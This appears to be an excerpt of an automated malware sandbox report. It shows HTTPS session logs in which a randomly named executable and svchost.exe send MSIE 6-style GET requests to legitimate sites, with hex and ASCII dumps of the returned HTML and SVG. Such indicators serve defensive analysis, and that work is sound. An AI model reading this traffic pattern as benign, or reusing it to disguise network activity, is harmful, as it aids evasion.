                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC740INData Raw: 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2e 33 33 2c 33 31 31 2e 38 37 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2c 33 30 33 2e 30 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e
                                                                                                                                                                                                                                                                    Data Ascii: 1,3.66.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M97.33,311.87a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M97,303.09a2.19,2.19,0,0,1-1,2.83,3.18,3.
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC756INData Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 38 35 2c 31 32 36 2e 36 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 35 36 2c 31 31 37 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36
                                                                                                                                                                                                                                                                    Data Ascii: <path class="cls-7" d="M117.85,126.61a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.67,2.67,0,0,1,.19,3.61"/><path class="cls-7" d="M117.56,117.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.6
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC772INData Raw: 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 36 31 2c 31 38 36 2e 38 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 33 31 2c 31 37 38 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e
                                                                                                                                                                                                                                                                    Data Ascii: ,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.61,186.86a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.2,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.31,178.08a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC788INData Raw: 33 37 2c 32 34 37 2e 31 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 33 2e 30 37 2c 32 33 38 2e 33 32 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30
                                                                                                                                                                                                                                                                    Data Ascii: 37,247.1a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M193.07,238.32a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC804INData Raw: 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 31 2e 31 32 2c 33 30 37 2e 33 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 38 33 2c 32 39 38 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 34 2e
                                                                                                                                                                                                                                                                    Data Ascii: ,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M231.12,307.35a2.16,2.16,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M230.83,298.57a2.19,2.19,0,0,1-1,2.83,3.2,3.2,0,0,1-4.
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC820INData Raw: 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 36 34 2c 31 32 32 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 33 35 2c 31 31 33 2e 33 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                    Data Ascii: 69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M251.64,122.08a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M251.35,113.31a2.17,2.17,0,0,1-1,2.82,3.18,3.18,0,0,
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC836INData Raw: 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 34 2c 31 38 32 2e 33 33 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 31 2c 31 37 33 2e 35 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39
                                                                                                                                                                                                                                                                    Data Ascii: 7,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M289.4,182.33a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M289.1,173.55a2.17,2.17,0,0,1-1,2.83,3.19
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC852INData Raw: 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 37 2e 31 36 2c 32 34 32 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 36 2e 38 36 2c 32 33 33 2e 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                    Data Ascii: .87,2.87,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M327.16,242.57a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M326.86,233.8a2.17,2.17,0,0,
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC868INData Raw: 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 39 31 2c 33 30 32 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 36 32 2c 32 39 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33
                                                                                                                                                                                                                                                                    Data Ascii: ,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M364.91,302.82a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M364.62,294a2.19,2.19,0,0,1-1,2.83,3.19,3
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC884INData Raw: 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 36 34 2c 32 30 32 2e 33 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61
                                                                                                                                                                                                                                                                    Data Ascii: .93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M290.64,202.37a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><pa


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                    4192.168.2.45546291.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2023-07-27 19:45:15 UTC900OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                    Accept: *
                                                                                                                                                                                                                                                                    Accept-Language: en-us
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                    Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                    2023-07-27 19:45:16 UTC900INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                    Date: Thu, 27 Jul 2023 19:47:06 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                    2023-07-27 19:45:16 UTC900INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                    Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                    2023-07-27 19:45:16 UTC916INData Raw: 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f 6e 74 0d 0a 32 30 30 30 0d 0a 65 6e 74 20 20 2d 2d 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 0d 0a 20 20 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20
                                                                                                                                                                                                                                                                    Data Ascii: </div> </div> </article> </section> </section></div>... topnews. -->... cont2000ent --><div id="content"> ... content-left --> <article id="wtxt" class="mainLeft"> ...
                                                                                                                                                                                                                                                                    2023-07-27 19:45:16 UTC932INData Raw: 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20 68 65 69 67 68 74 3a 38 35 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 33 39 36 31 2c 64 6f 70 61 6c 61 63 0d 0a 31 30 30 30 0d 0a 7a 65 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 64 6f 70 61 6c 61 63 7a 65 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 33 39 36 31 2e 6a 70 67 3f 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61
                                                                                                                                                                                                                                                                    Data Ascii: aria-hidden="true" /></a></div><div class="item" style="width:300px; height:85px;margin-bottom:10px"><a href="/w20/batony/3961,dopalac1000ze.html" target="_blank" aria-label="dopalacze"><img src="/dokumenty/batony/3961.jpg?v=1657112618" a
                                                                                                                                                                                                                                                                    2023-07-27 19:45:16 UTC948INData Raw: 63 6a 61 50 4c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 74 69 74 6c 65 3d 22 4f 64 77 69 65 64 c5 ba 20 6e 61 73 20 6e 61 20 59 6f 75 54 75 62 65 22 20 63 6c 61 73 73 3d 22 79 74 22 3e 4f 64 77 69 65 64 c5 ba 20 6e 61 73 20 6e 61 20 59 6f 75 54 75 62 65 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 57 69 65 6c 6b 6f 70 6f 6c 73 6b 61 2d 50 6f 0d 0a 37 34 32 0d 0a 6c 69 63 6a 61 2d 34 39 30 31 39 36 36 30 34 34 37 30 33 34 32 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 74 69 74 6c 65 3d 22 4f 64 77 69 65 64 c5 ba 20 6e 61 73 20 6e 61 20 46 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73
                                                                                                                                                                                                                                                                    Data Ascii: cjaPL" target="_blank" title="Odwied nas na YouTube" class="yt">Odwied nas na YouTube</a></li> <li><a href="https://www.facebook.com/Wielkopolska-Po742licja-490196604470342/" target="_blank" title="Odwied nas na Facebook" clas


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                    5192.168.2.455471188.114.97.7443C:\Users\user\Desktop\PIyT9A3jfC.exe
                                                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2023-07-27 19:45:16 UTC950OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                    Accept: *
                                                                                                                                                                                                                                                                    Accept-Language: en-us
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                    Host: hyab.se
                                                                                                                                                                                                                                                                    2023-07-27 19:45:16 UTC951INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                    Date: Thu, 27 Jul 2023 19:45:16 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    Location: https://hyab.com
                                                                                                                                                                                                                                                                    Cache-Control: max-age=600
                                                                                                                                                                                                                                                                    Expires: Thu, 27 Jul 2023 19:55:16 GMT
                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rhcf6WudIMz9eELlzrEyseRAPfGgmb68EwbVPfbZi%2F9g%2B6InVhQR60f8F5pGB%2F2IgiVL1xrzEvHxWsOhXCZr9%2Bst%2FY8R9Jfjc6u8xPB3qNaDIRtYXSFPAL1F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    CF-RAY: 7ed761bed812bb50-FRA
                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                    2023-07-27 19:45:16 UTC951INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                    2023-07-27 19:45:16 UTC951INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                    6192.168.2.455464172.67.156.49443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2023-07-27 19:45:16 UTC950OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                    Accept: *
                                                                                                                                                                                                                                                                    Accept-Language: en-us
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                    Host: orlyhotel.com
                                                                                                                                                                                                                                                                    Cookie: django_language=en
                                                                                                                                                                                                                                                                    2023-07-27 19:45:16 UTC952INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                    Date: Thu, 27 Jul 2023 19:45:16 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                    Expires: Thu, 27 Jul 2023 19:33:03 GMT
                                                                                                                                                                                                                                                                    Content-Language: en
                                                                                                                                                                                                                                                                    Last-Modified: Thu, 27 Jul 2023 19:33:03 GMT
